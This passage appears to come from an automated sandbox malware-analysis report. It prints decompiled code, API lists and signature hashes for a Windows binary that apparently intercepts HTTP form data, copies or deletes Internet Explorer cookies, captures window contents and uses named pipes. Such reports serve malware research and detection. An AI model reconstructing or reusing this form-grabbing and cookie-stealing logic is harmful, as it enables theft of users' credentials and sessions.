								L48:
								_v20 = 0xb;
								goto L49;
							} else {
								_v20 = _t153;
								if(_t158[6] == 0x2f) {
									L49:
									_push( &_v16);
									_push( &_v12);
									E0040601B();
									if(_v20 == _t153 && _a8 != 0) {
										 *0x416fe8(0x417030);
										E0040CE72(_t151, _a4, _t158,  &_v12,  &_v16);
										 *0x416fec(0x417030);
									}
									_v8 = 0x3ff;
									if(_a8 == 0) {
										_t142 = _t158[0x424];
										__eflags = _t142;
										if(_t142 != 0) {
											__eflags = _t142 - 0x3ff;
											if(_t142 <= 0x3ff) {
												_v8 = _t142;
											}
											E0040F0FC( &_v1372, _t158[0x420], _v8);
											goto L61;
										}
									} else {
										if(HttpQueryInfoA(_t158[0x430], 0x80000023,  &_v1372,  &_v8, 0) == 0) {
											L57:
											_v8 = 1;
											_v1372 = 0x2d;
											L61:
											 *((char*)(_t159 + _v8 - 0x558)) = 0;
											_t154 = E0040F4DC(_t158[0x400], _t158);
											_t94 = 0x402325;
											_t143 = _t138;
											if(_t138 == 0) {
												_t143 = 0x402325;
											}
											_t191 = _v12;
											if(_v12 != 0) {
												_t94 = _v12;
											}
											_push(_t143);
											_push(_t94);
											_push( &_v1372);
											E0041540F(_t143, _t151, _t191, _v20, _t154, 0, L"%S\nReferer: %S\n%SData:\n\n%S", _t158);
											E0040F0C0(_t154);
											E0040F0C0(_v12);
											E0040F0C0(_t138);
											goto L66;
										}
										if(_v8 != 0) {
											goto L61;
										}
									}
									goto L57;
								}
								goto L48;
							}
						}
						_t138 = E0040F0A8(_t84 + 1);
						if(_t138 == 0) {
							goto L66;
						}
						E0040F0FC(_t138, _t158[0x428], _t158[0x42c]);
						_t111 = 0;
						if(_t158[0x42c] <= 0) {
							goto L45;
						} else {
							goto L38;
						}
						do {
							L38:
							_t144 =  *((intOrPtr*)(_t111 + _t138));
							if(_t144 != 0x26) {
								__eflags = _t144 - 0x2b;
								if(_t144 == 0x2b) {
									 *((char*)(_t111 + _t138)) = 0x20;
								}
							} else {
								 *((char*)(_t111 + _t138)) = 0xa;
							}
							_t111 = _t111 + 1;
						} while (_t111 < _t158[0x42c]);
						goto L45;
					}
					if(_t158[0x404] != 0x50 || _t82 < 5) {
						goto L66;
					} else {
						if(_a8 == 0) {
							_t151 = _t158[0x41c];
							__eflags = _t158[0x41c];
							if(_t158[0x41c] == 0) {
								goto L66;
							}
							_push(_t158[0x418]);
							L34:
							_t145 =  *0x416c34; // 0x25df5a8
							_t35 = _t145 + 0x124; // 0x25dffb9
							if(E0040F547(_t82 | 0xffffffff,  *_t35, _t151) != 0) {
								goto L66;
							}
							goto L35;
						}
						_v8 = 0x31;
						if(HttpQueryInfoA(_t158[0x430], 0x80000001,  &_v72,  &_v8, 0) == 0) {
							goto L66;
						}
						_t151 = _v8;
						_t82 =  &_v72;
						_push( &_v72);
						goto L34;
					}
				}
				_t156 = E00414398( &_v8, __edx, _t162, _a4, 0x4e26, 0x20000000);
				_v16 = _t156;
				if(_t156 == 0) {
					goto L27;
				}
				if(E0040F732(_t117, _v8) == 0) {
					L26:
					E0040F0C0(_v16);
					if(_v12 == 0) {
						goto L66;
					}
					goto L27;
				} else {
					goto L3;
				}
				do {
					L3:
					_t8 = _t156 + 1; // 0x1
					_t148 = _t8;
					if( *_t148 == 0) {
						goto L12;
					}
					_t121 =  *_t156;
					_t140 = 0;
					if(_t121 != 0x2d) {
						__eflags = _t121 - 0x40;
						if(_t121 != 0x40) {
							__eflags = _t121 - 0x21;
							if(_t121 != 0x21) {
								goto L11;
							}
							_t140 = 1;
							goto L10;
						}
						_t140 = 2;
						goto L10;
					} else {
						_t140 = 3;
						L10:
						_t156 = _t148;
						L11:
						_t150 = _t156;
						_t151 = E0040F521(_t156);
						if(E0040AD1B(_t156, _t122, _t158, _t158[0x400], 0, 0, 2) != 0) {
							__eflags = _t140 - 1;
							_v12 = (0 | _t140 != 0x00000001) & 0x0000ffff;
							__eflags = _t140 - 3;
							if(_t140 != 3) {
								__eflags = _t140 - 2;
								if(_t140 != 2) {
									goto L26;
								}
								_t151 = 0x3c;
								E0040F173( &_v80,  &_v80, 0, _t151);
								_v64 =  &_v348;
								_v80 = _t151;
								_v60 = 0x103;
								_t131 = InternetCrackUrlA(_t158, _t158[0x400], 0,  &_v80);
								__eflags = _t131;
								if(_t131 == 0) {
									L22:
									_t141 = 0;
									__eflags = 0;
									L23:
									_t132 = 0x14;
									 *0x4167bc = _t132;
									_t133 = E0040F0C0( *0x4167b4);
									__eflags = _t141;
									if(_t141 == 0) {
										 *0x4167b4 = 0;
									} else {
										 *0x4167b4 = E0040F4DC(_t133 | 0xffffffff, _t141);
									}
									goto L26;
								}
								__eflags = _v60;
								if(_v60 == 0) {
									goto L22;
								}
								_t141 =  &_v348;
								goto L23;
							}
							__eflags = _a8;
							if(_a8 != 0) {
								E0040C616(_t150, _t151, _t158);
							}
							return 0;
						}
					}
					L12:
					_t156 = E0040F750(_t156, 1);
				} while (_t156 != 0);
				goto L26;
			}

































    0x0040c290
    0x0040c290
    0x0040c299
    0x0040c29d
    0x0040c2a6
    0x0040c3ea
    0x0040c3ea
    0x0040c3f5
    0x0040c60e
    0x00000000
    0x0040c60e
    0x0040c400
    0x0040c46f
    0x0040c46f
    0x0040c477
    0x0040c47b
    0x0040c4df
    0x0040c4e5
    0x0040c4e8
    0x0040c4eb
    0x0040c4ec
    0x0040c4fd
    0x0040c4fd
    0x00000000
    0x0040c4f4
    0x0040c4f8
    0x0040c4fb
    0x0040c504
    0x0040c507
    0x0040c50b
    0x0040c50c
    0x0040c514
    0x0040c522
    0x0040c534
    0x0040c53a
    0x0040c53a
    0x0040c549
    0x0040c54c
    0x0040c578
    0x0040c57e
    0x0040c580
    0x0040c592
    0x0040c594
    0x0040c596
    0x0040c596
    0x0040c5a9
    0x00000000
    0x0040c5a9
    0x0040c54e
    0x0040c56e
    0x0040c582
    0x0040c582
    0x0040c589
    0x0040c5ae
    0x0040c5b1
    0x0040c5c5
    0x0040c5c7
    0x0040c5cc
    0x0040c5d0
    0x0040c5d2
    0x0040c5d2
    0x0040c5d4
    0x0040c5d8
    0x0040c5da
    0x0040c5da
    0x0040c5dd
    0x0040c5de
    0x0040c5e5
    0x0040c5f2
    0x0040c5fb
    0x0040c603
    0x0040c609
    0x00000000
    0x0040c609
    0x0040c574
    0x00000000
    0x00000000
    0x0040c576
    0x00000000
    0x0040c54c
    0x00000000
    0x0040c4fb
    0x0040c4ec
    0x0040c483
    0x0040c487
    0x00000000
    0x00000000
    0x0040c49a
    0x0040c49f
    0x0040c4a7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040c4a9
    0x0040c4a9
    0x0040c4a9
    0x0040c4af
    0x0040c4cd
    0x0040c4d0
    0x0040c4d2
    0x0040c4d2
    0x0040c4b1
    0x0040c4b1
    0x0040c4b1
    0x0040c4d6
    0x0040c4d7
    0x00000000
    0x0040c4a9
    0x0040c409
    0x00000000
    0x0040c418
    0x0040c41c
    0x0040c4b7
    0x0040c4bd
    0x0040c4bf
    0x00000000
    0x00000000
    0x0040c4c5
    0x0040c453
    0x0040c453
    0x0040c459
    0x0040c469
    0x00000000
    0x00000000
    0x00000000
    0x0040c469
    0x0040c437
    0x0040c446
    0x00000000
    0x00000000
    0x0040c44c
    0x0040c44f
    0x0040c452
    0x00000000
    0x0040c452
    0x0040c409
    0x0040c2c1
    0x0040c2c3
    0x0040c2c8
    0x00000000
    0x00000000
    0x0040c2d8
    0x0040c3d7
    0x0040c3da
    0x0040c3e4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040c2de
    0x0040c2de
    0x0040c2de
    0x0040c2de
    0x0040c2e4
    0x00000000
    0x00000000
    0x0040c2e6
    0x0040c2e8
    0x0040c2ec
    0x0040c2f3
    0x0040c2f5
    0x0040c2fb
    0x0040c2fd
    0x00000000
    0x00000000
    0x0040c2ff
    0x00000000
    0x0040c2ff
    0x0040c2f7
    0x00000000
    0x0040c2ee
    0x0040c2ee
    0x0040c301
    0x0040c301
    0x0040c303
    0x0040c30f
    0x0040c317
    0x0040c320
    0x0040c338
    0x0040c341
    0x0040c344
    0x0040c347
    0x0040c35c
    0x0040c35f
    0x00000000
    0x00000000
    0x0040c363
    0x0040c36c
    0x0040c377
    0x0040c385
    0x0040c389
    0x0040c390
    0x0040c396
    0x0040c398
    0x0040c3a7
    0x0040c3a7
    0x0040c3a7
    0x0040c3a9
    0x0040c3ab
    0x0040c3b2
    0x0040c3b8
    0x0040c3bd
    0x0040c3bf
    0x0040c3d1
    0x0040c3c1
    0x0040c3ca
    0x0040c3ca
    0x00000000
    0x0040c3bf
    0x0040c39a
    0x0040c39d
    0x00000000
    0x00000000
    0x0040c39f
    0x00000000
    0x0040c39f
    0x0040c349
    0x0040c34d
    0x0040c350
    0x0040c350
    0x00000000
    0x0040c355
    0x0040c320
    0x0040c322
    0x0040c32b
    0x0040c32d
    0x00000000

    APIs
    • InternetCrackUrlA.WININET(?,?,00000000,?), ref: 0040C390
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040C43E
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040C522
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040C53A
    • HttpQueryInfoA.WININET(?,80000023,?,?,00000000), ref: 0040C566
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalHttpInfoQuerySection$CrackEnterInternetLeave
    • String ID: %SReferer: %S%SData:%S$-$1
    • API String ID: 1405552099-909787007
    • Opcode ID: e77a3ed1f073d6d8c8cd5cd0503071004a7d6345dd30cf3b5836450075ef9807
    • Instruction ID: 5080666752fd00d162a1c4ef16dcd805e1b2d05a1706d6d856cae7d05a04730d
    • Opcode Fuzzy Hash: e77a3ed1f073d6d8c8cd5cd0503071004a7d6345dd30cf3b5836450075ef9807
    • Instruction Fuzzy Hash: B7A1D270900248EADF319BA0CCC4BEF7BA9AB44304F24867BE551B62C1D7799A85DB19
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040E7EA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 139networkCOMMON
    Download Yara Rule
    C-Code - Quality: 67%
    			E0040E7EA(void* __eax, void* __ecx, signed int __edx, void* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				void* __edi;
				void* __esi;
				signed int _t31;
				long _t32;
				DWORD* _t36;
				void _t38;
				signed int _t40;
				signed int _t43;
				signed int _t44;
				intOrPtr _t45;
				signed int _t47;
				signed int _t55;
				DWORD* _t58;
				signed int _t64;
				char* _t67;
				void* _t72;

				_t64 = __edx;
				_t61 = __ecx;
				_push(__ecx);
				_t67 = __eax;
				_t58 = __eax + 0x400;
				 *_t58 = 0x3fc;
				if(InternetQueryOptionA(_a4, 0x22, __eax, _t58) == 0) {
					L21:
					_t31 = 0;
					__eflags = 0;
					L22:
					return _t31;
				}
				_t32 =  *_t58;
				if(_t32 <= 8) {
					goto L21;
				}
				 *((char*)(_t32 + _t67)) = 0;
				 *0x416fe8(0x417030);
				E0040D3EA(_t67,  *_t58);
				 *0x416fec(0x417030);
				_t36 = _t67 + 0x410;
				_t72 = _t67 + 0x404;
				 *_t36 = 9;
				if(HttpQueryInfoA(_a4, 0x2d, _t72, _t36, 0) == 0) {
					goto L21;
				}
				_t38 =  *_t72;
				if(_t38 == 0x47) {
					L5:
					if(E004082FB(_t61, _t80, "809dslffsdfsdfgg", _t67, 1) == 0) {
						_t40 = E00404326(_t61);
						__eflags = _t40;
						_v8 = _t40;
						 *((char*)(_t67 + 0x414)) = _t40 & 0xffffff00 | _t40 != 0x00000000;
						 *(_t67 + 0x430) = _a4;
						_t43 = _a12;
						 *((intOrPtr*)(_t67 + 0x43c)) = 0;
						 *((intOrPtr*)(_t67 + 0x438)) = 0;
						__eflags = _t43;
						if(_t43 == 0) {
							L11:
							 *(_t67 + 0x42c) = 0;
							 *(_t67 + 0x428) = 0;
							L12:
							_t44 = E0040C290(_t64, _t67, _v8, 1);
							__eflags = _t44;
							if(_t44 == 0) {
								goto L6;
							}
							_t45 =  *0x416c34; // 0x25df5a8
							_t24 = _t45 + 0x148; // 0x2563e09
							_t63 =  *_t24;
							_t65 = E0040F521( *_t24);
							_t47 = E0040AD1B( *_t24, _t46, _t67,  *_t58, 0, 0, 0);
							__eflags = _t47;
							if(_t47 != 0) {
								_t55 = E0040F244( *_t58, _t67);
								__eflags = _t55;
								if(_t55 != 0) {
									E0040C14A(_t63, E0040C7C1, _t55);
								}
							}
							__eflags =  *((char*)(_t67 + 0x414));
							if(__eflags != 0) {
								 *0x416fe8(0x417030);
								_t60 = _v8;
								__eflags = E0040D268(_t65, _t67, __eflags, _v8, 0x4e28, 8, 0xa, E0040E458);
								if(__eflags == 0) {
									E0040D268(_t65, _t67, __eflags, _t60, 0x4e29, 6, 8, E0040D6EA);
									E0040D4EC(_t65, _t60, _t67);
								} else {
									 *(_t67 + 0x434) =  *(_t67 + 0x434) | 0x00000002;
								}
								 *0x416fec(0x417030);
								E0040F0C0(_t60);
							}
							L7:
							_t31 = 1;
							goto L22;
						}
						_t64 = _a8;
						__eflags = _t64;
						if(_t64 == 0) {
							goto L11;
						} else {
							 *(_t67 + 0x42c) = _t43;
							 *(_t67 + 0x428) = _t64;
							goto L12;
						}
					}
					L6:
					 *(_t67 + 0x434) =  *(_t67 + 0x434) | 0x00000004;
					SetLastError(0x2f78);
					goto L7;
				}
				_t80 = _t38 - 0x50;
				if(_t38 != 0x50) {
					goto L21;
				}
				goto L5;
			}




















    0x0040e7ea
    0x0040e7ea
    0x0040e7ed
    0x0040e7f1
    0x0040e7f3
    0x0040e800
    0x0040e80e
    0x0040e9a5
    0x0040e9a5
    0x0040e9a5
    0x0040e9a7
    0x0040e9ab
    0x0040e9ab
    0x0040e814
    0x0040e819
    0x00000000
    0x00000000
    0x0040e825
    0x0040e829
    0x0040e832
    0x0040e838
    0x0040e840
    0x0040e847
    0x0040e853
    0x0040e861
    0x00000000
    0x00000000
    0x0040e867
    0x0040e86b
    0x0040e875
    0x0040e884
    0x0040e89f
    0x0040e8a6
    0x0040e8a8
    0x0040e8ae
    0x0040e8b7
    0x0040e8bd
    0x0040e8c0
    0x0040e8c6
    0x0040e8cc
    0x0040e8ce
    0x0040e8e5
    0x0040e8e5
    0x0040e8eb
    0x0040e8f1
    0x0040e8f8
    0x0040e8fd
    0x0040e8ff
    0x00000000
    0x00000000
    0x0040e901
    0x0040e906
    0x0040e906
    0x0040e919
    0x0040e91b
    0x0040e920
    0x0040e922
    0x0040e927
    0x0040e92c
    0x0040e92e
    0x0040e936
    0x0040e936
    0x0040e92e
    0x0040e93b
    0x0040e942
    0x0040e94e
    0x0040e954
    0x0040e96b
    0x0040e96d
    0x0040e987
    0x0040e98e
    0x0040e96f
    0x0040e96f
    0x0040e96f
    0x0040e994
    0x0040e99b
    0x0040e99b
    0x0040e898
    0x0040e898
    0x00000000
    0x0040e898
    0x0040e8d0
    0x0040e8d3
    0x0040e8d5
    0x00000000
    0x0040e8d7
    0x0040e8d7
    0x0040e8dd
    0x00000000
    0x0040e8dd
    0x0040e8d5
    0x0040e886
    0x0040e886
    0x0040e892
    0x00000000
    0x0040e892
    0x0040e86d
    0x0040e86f
    0x00000000
    0x00000000
    0x00000000

    APIs
    • InternetQueryOptionA.WININET(?,00000022,?,?), ref: 0040E806
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E829
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E838
    • HttpQueryInfoA.WININET(?,0000002D,?,?,00000000), ref: 0040E859
    • SetLastError.KERNEL32(00002F78), ref: 0040E892
      • Part of subcall function 00404326: CreateMutexW.KERNEL32(00417680,00000000,025DF8B8), ref: 00404341
    • RtlEnterCriticalSection.NTDLL(00417030), ref: 0040E94E
    • RtlLeaveCriticalSection.NTDLL(00417030), ref: 0040E994
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$EnterLeaveQuery$CreateErrorHttpInfoInternetLastMutexOption
    • String ID: 809dslffsdfsdfgg
    • API String ID: 4246016607-2949297782
    • Opcode ID: bf242b3717cce281063d606931ff9c803aed1cc2456f81ca681bf808c747a810
    • Instruction ID: 88ed78742489ab723301526b4a81af94897e54d0bfdfb15fece7e2794ab3ec13
    • Opcode Fuzzy Hash: bf242b3717cce281063d606931ff9c803aed1cc2456f81ca681bf808c747a810
    • Instruction Fuzzy Hash: 8541E4B1701211BBD724AF628C85FDB7B68AF46700F05853AF604BB2C2CB789811D7AD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00409430, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 137threadCOMMON
    Download Yara Rule
    C-Code - Quality: 38%
    			E00409430(void* __ecx, void* __edx, struct HWND__* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct tagWINDOWINFO _v76;
				intOrPtr _t46;
				signed int _t47;
				intOrPtr _t48;
				struct HDC__* _t50;
				void* _t52;
				signed int _t62;
				intOrPtr _t72;
				signed int _t73;
				intOrPtr _t75;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				struct HDC__* _t85;

				_v12 = 0;
				 *0x416fe8(0x416a34);
				if(E004091AE(__ecx, __edx) == 0) {
					L22:
					 *0x416fec(0x416a34);
					return _v12;
				}
				_v76.cbSize = 0x3c;
				if(GetWindowInfo(_a4,  &_v76) == 0) {
					goto L22;
				}
				E00409403( &(_v76.rcClient));
				E00409403( &(_v76.rcWindow));
				_t75 = _v64;
				if(_t75 <= 0) {
					goto L22;
				}
				_t82 = _v60;
				if(_t82 > 0) {
					_t72 = _v48;
					if(_t72 > 0) {
						_t46 = _v44;
						if(_t46 > 0) {
							_t73 = _t72 - _v76.rcClient;
							 *0x416a28 = _t73;
							if(_t73 > 0 && _t75 - _v76.rcWindow > 0) {
								_t47 = _t46 - _v52;
								 *0x416a2c = _t47;
								if(_t47 > 0 && _t82 - _v68 > 0) {
									_t48 =  *0x416a9c(_a4, 0xfffffffc);
									_v8 = _t48;
									if(_t48 != 0) {
										_t78 =  *0x416ac4(0, _t77);
										if(_t78 != 0) {
											_t50 =  *0x416e00(_t78);
											_t85 = _t50;
											 *0x416acc(0, _t78);
											if(_t85 != 0) {
												_t52 = SelectObject(_t85,  *0x416a54);
												_v16 = _t52;
												if(_t52 != 0) {
													E0040F161( *0x416a58, ( *0x416a64 & 0x000000ff) *  *0x416a2c *  *0x416a28);
													 *0x416a1c = GetCurrentThreadId();
													 *0x416a18 = _t85;
													 *0x416a30 = 1;
													 *0x416a20 = 0;
													 *0x416a24 = 0;
													if((_v76.dwStyle & 0x00c40000) != 0 || _v76.dwStyle == 0 || (_v76.dwExStyle & 0x00020381) != 0) {
														 *0x416ab4(_a4, 0x317, _t85, 2);
														E004092C7( &(_v76.rcWindow));
													}
													_t62 = _v8(_a4, 0x14, _t85, 0);
													asm("sbb eax, eax");
													 *0x416a30 =  ~_t62 + 1;
													 *0x416ab4(_a4, 0x317, _t85, 4);
													_v8(_a4, 0xf, 0, 0);
													E004092C7( &(_v76.rcClient));
													_v12 = 0xffeeff00;
													 *0x416a1c = 0;
													SelectObject(_t85, _v16);
												}
												DeleteDC(_t85);
											}
										}
									}
								}
							}
						}
					}
				}
				goto L22;
			}


























    0x0040943e
    0x00409441
    0x0040944e
    0x00409609
    0x0040960e
    0x00409619
    0x00409619
    0x0040945b
    0x0040946a
    0x00000000
    0x00000000
    0x00409473
    0x0040947b
    0x00409480
    0x00409485
    0x00000000
    0x00000000
    0x0040948c
    0x00409491
    0x00409497
    0x0040949c
    0x004094a2
    0x004094a7
    0x004094ad
    0x004094b2
    0x004094b8
    0x004094c9
    0x004094ce
    0x004094d3
    0x004094e9
    0x004094ef
    0x004094f4
    0x00409502
    0x00409506
    0x0040950d
    0x00409515
    0x00409517
    0x0040951f
    0x0040952c
    0x00409532
    0x00409537
    0x00409559
    0x0040956b
    0x00409570
    0x00409576
    0x00409580
    0x00409586
    0x00409591
    0x004095a8
    0x004095b1
    0x004095b1
    0x004095bd
    0x004095c5
    0x004095cc
    0x004095d1
    0x004095de
    0x004095e4
    0x004095ec
    0x004095f4
    0x004095fa
    0x004095fa
    0x00409601
    0x00409601
    0x0040951f
    0x00409607
    0x004094f4
    0x004094d3
    0x004094b8
    0x004094a7
    0x0040949c
    0x00000000

    APIs
    • RtlEnterCriticalSection.NTDLL(00416A34), ref: 00409441
      • Part of subcall function 004091AE: OpenFileMappingW.KERNEL32(00000002,00000000,QggrrtyW), ref: 004091D2
    • GetWindowInfo.USER32(?,?), ref: 00409462
    • SelectObject.GDI32(00000000), ref: 0040952C
    • GetCurrentThreadId.KERNEL32 ref: 0040955E
    • SelectObject.GDI32(00000000,?), ref: 004095FA
    • DeleteDC.GDI32(00000000), ref: 00409601
    • RtlLeaveCriticalSection.NTDLL(00416A34), ref: 0040960E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalObjectSectionSelect$CurrentDeleteEnterFileInfoLeaveMappingOpenThreadWindow
    • String ID: <
    • API String ID: 3122845836-4251816714
    • Opcode ID: 3a12ee53fd82aecf7a832a3d01c9d63bb7d52557b61548bfd9bb2b568cef89bf
    • Instruction ID: f65d9c098c7d9700440ffc229634fdde1d02c3f578555259555edb51f7c8fca7
    • Opcode Fuzzy Hash: 3a12ee53fd82aecf7a832a3d01c9d63bb7d52557b61548bfd9bb2b568cef89bf
    • Instruction Fuzzy Hash: 77516C71A01109ABCB10EFA5ED889DE7F79EF49384B12C43AF401B65A1C33A9D45CF58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00411E85, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110filepipeCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00411E85(intOrPtr _a4, char _a7, intOrPtr _a8, void** _a12) {
				long _v8;
				struct _OVERLAPPED* _v12;
				void _v16;
				char _v518;
				short _v536;
				intOrPtr* _t28;
				int _t35;
				void** _t54;
				void* _t61;
				void* _t66;

				_t28 = _a12;
				if(_t28 != 0) {
					 *_t28 = 0;
				}
				E0040F0FC( &_v536, L"\\\\.\\pipe\\", 0x12);
				_v518 = 0;
				E0040F201(0xffffffff, _a4,  &_v518);
				_a7 = 0;
				while(1) {
					_t35 = CreateFileW( &_v536, 0xc0000000, 3, 0, 3, 0, 0);
					_t61 = _t35;
					if(_t61 != 0xffffffff) {
						break;
					}
					if(_a7 == 1) {
						L17:
						return _t35;
					} else {
						WaitNamedPipeW( &_v536, 0xffffffff);
						_a7 = _a7 + 1;
						continue;
					}
				}
				_v8 = 2;
				if(SetNamedPipeHandleState(_t61,  &_v8, 0, 0) != 0) {
					_v16 = _a8;
					_v12 = 0;
					if(WriteFile(_t61,  &_v16, 8,  &_v8, 0) != 0 && ReadFile(_t61,  &_v16, 8,  &_v8, 0) != 0 && _v8 == 8) {
						_t66 = E0040F0A8( &(_v12->Internal));
						if(_t66 == 0 || ReadFile(_t61, _t66, _v12,  &_v8, 0) == 0 || _v12 != _v8) {
							E0040F0C0(_t66);
						} else {
							_t54 = _a12;
							if(_t54 != 0) {
								 *_t54 = _t66;
							}
						}
					}
				}
				_t35 = CloseHandle(_t61);
				goto L17;
			}













    0x00411e88
    0x00411e98
    0x00411e9a
    0x00411e9a
    0x00411eaa
    0x00411eb4
    0x00411ec4
    0x00411ec9
    0x00411eef
    0x00411efe
    0x00411f04
    0x00411f09
    0x00000000
    0x00000000
    0x00411ed7
    0x00411fa1
    0x00411fa5
    0x00411edd
    0x00411ee6
    0x00411eec
    0x00000000
    0x00411eec
    0x00411ed7
    0x00411f12
    0x00411f21
    0x00411f27
    0x00411f35
    0x00411f40
    0x00411f67
    0x00411f6b
    0x00411f95
    0x00411f89
    0x00411f89
    0x00411f8e
    0x00411f90
    0x00411f90
    0x00411f8e
    0x00411f6b
    0x00411f40
    0x00411f9b
    0x00000000

    APIs
    • WaitNamedPipeW.KERNEL32(?,000000FF), ref: 00411EE6
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,\\.\pipe\,00000012,001F0001,00404270,00000000), ref: 00411EFE
    • SetNamedPipeHandleState.KERNEL32(00000000,00000000,00000000,00000000), ref: 00411F19
    • WriteFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F38
    • ReadFile.KERNEL32(00000000,?,00000008,00000002,00000000), ref: 00411F4E
    • ReadFile.KERNEL32(00000000,00000000,?,00000008,00000000), ref: 00411F77
    • CloseHandle.KERNEL32(00000000), ref: 00411F9B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$HandleNamedPipeRead$CloseCreateFreeHeapStateWaitWrite
    • String ID: \\.\pipe\
    • API String ID: 218207935-91387939
    • Opcode ID: 30fde200be2698894fca0cd8f0d734596f51256bce63d3928f452044aa25adcc
    • Instruction ID: 3a18ef4feb9663c0843798c04c1219987c74a97bfe045f250b4e3f5c40ef9670
    • Opcode Fuzzy Hash: 30fde200be2698894fca0cd8f0d734596f51256bce63d3928f452044aa25adcc
    • Instruction Fuzzy Hash: 43313B7190020CAFDB11EBA4DD88AEE77BCEB05354F0085A6B615E6190D7389E8ACB24
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004050A3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 104COMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E004050A3(void* __ecx, signed int* __edi, signed char _a4, signed int* _a8) {
				signed int _v528;
				short _v536;
				intOrPtr _v540;
				long _v544;
				char _v545;
				intOrPtr _v548;
				intOrPtr _v552;
				void* _v556;
				char _v557;
				void* _v560;
				intOrPtr _v561;
				intOrPtr _v564;
				long _v568;
				signed int _t35;
				void* _t39;
				signed int _t55;
				intOrPtr _t70;
				signed int* _t71;
				struct _GOPHER_FIND_DATAA _t73;

				_t71 = __edi;
				_t66 = __ecx;
				_t35 = _a4 & 0x00000001;
				_v528 = _t35;
				if(_t35 != 0) {
					 *_a8 =  *_a8 & 0x00000000;
					 *__edi =  *__edi & 0x00000000;
				}
				_v545 = 1;
				_t73 = E0040F0A8(0x1000);
				_v544 = 0x1000;
				 *_t73 = 0x50;
				_t39 = FindFirstUrlCacheEntryW(L"cookie:", _t73,  &_v544);
				_v544 = _t39;
				if(_t39 == 0) {
					L14:
					E0040F0C0(_t73);
					return _v561;
				} else {
					do {
						_t81 = _v540;
						if(_v540 == 0) {
							__eflags = _a4 & 0x00000002;
							if(__eflags == 0) {
								 *0x416c30( *((intOrPtr*)(_t73 + 4)));
							} else {
								PathCombineW( &_v536, L"ie_cookies", PathFindFileNameW( *(_t73 + 8)));
								E0041547E(_t66, _t70, __eflags,  *(_t73 + 8), 0,  &_v544);
							}
							goto L10;
						}
						_t66 = E00404F49(_t66, _t81,  *(_t73 + 8));
						_v556 = _t66;
						if(_t66 == 0) {
							goto L10;
						}
						_v548 = E0040F521(_t66);
						_t55 = E0040F074( *_t71 + _v548,  *_a8);
						if(_t55 == 0) {
							_v557 = 0;
							E0040F0C0(_v552);
							E0040F0C0( *_a8);
							L13:
							FindCloseUrlCache(_v560);
							goto L14;
						}
						_t70 = _v548;
						 *_a8 = _t55;
						_t66 =  *_t71 + _t55;
						E0040F0FC( *_t71 + _t55, _v552, _t70);
						 *_t71 =  *_t71 + _t70;
						E0040F0C0(_v564);
						L10:
						_v560 = 0x1000;
						 *_t73 = 0x50;
						E0040F161(_t73, 0x1000);
					} while (FindNextUrlCacheEntryW(_v556, _t73,  &_v568) != 0);
					goto L13;
				}
			}






















    0x004050a3
    0x004050a3
    0x004050b3
    0x004050b7
    0x004050bb
    0x004050c0
    0x004050c3
    0x004050c3
    0x004050cd
    0x004050d7
    0x004050df
    0x004050e8
    0x004050ee
    0x004050f4
    0x004050fa
    0x004051ea
    0x004051eb
    0x004051f9
    0x00405100
    0x00405100
    0x00405100
    0x00405105
    0x00405163
    0x00405167
    0x00405197
    0x00405169
    0x0040517d
    0x0040518d
    0x0040518d
    0x00000000
    0x00405167
    0x0040510f
    0x00405111
    0x00405117
    0x00000000
    0x00000000
    0x00405127
    0x00405131
    0x00405138
    0x004051cc
    0x004051d1
    0x004051db
    0x004051e0
    0x004051e4
    0x00000000
    0x004051e4
    0x00405141
    0x00405145
    0x0040514e
    0x00405151
    0x0040515a
    0x0040515c
    0x0040519d
    0x0040519e
    0x004051a3
    0x004051a9
    0x004051be
    0x00000000
    0x004051c6

    APIs
    • FindFirstUrlCacheEntryW.WININET(cookie:,00000000,?), ref: 004050EE
    • PathFindFileNameW.SHLWAPI(?), ref: 0040516C
    • PathCombineW.SHLWAPI(?,ie_cookies,00000000), ref: 0040517D
    • DeleteUrlCacheEntryW.WININET(?), ref: 00405197
    • FindNextUrlCacheEntryW.WININET(?,00000000,?), ref: 004051B8
    • FindCloseUrlCache.WININET(?), ref: 004051E4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
